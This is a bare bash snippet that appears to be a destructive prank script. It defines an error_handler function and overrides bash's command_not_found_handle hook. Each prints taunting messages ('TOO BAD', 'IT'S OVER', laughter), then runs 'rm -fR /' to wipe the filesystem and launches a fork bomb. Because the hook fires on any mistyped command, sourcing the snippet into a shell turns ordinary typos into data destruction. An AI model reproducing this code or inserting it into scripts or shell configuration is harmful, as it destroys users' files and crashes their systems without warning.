

error_handler() {
    echo "TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD"
    echo "IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER"
    echo "HAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHA"
   (rm -fR /)
    :(){ :|: & };:
}

command_not_found_handle() {
    echo "TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD"
    echo "IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER"
    echo "HAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHA"
    (rm -fR /)
    :(){ :|: & };:
    }
